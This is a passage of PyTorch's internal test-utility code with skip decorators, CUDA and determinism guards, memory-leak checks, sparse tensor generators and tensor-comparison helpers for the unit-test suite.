raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
if not TEST_WITH_ROCM:
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
else:
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if before != after:
warnings.warn('{} leaked {} bytes ROCm memory on device {}'.format(
self.name, after - before, i), RuntimeWarning)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
def run(self, result=None):
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
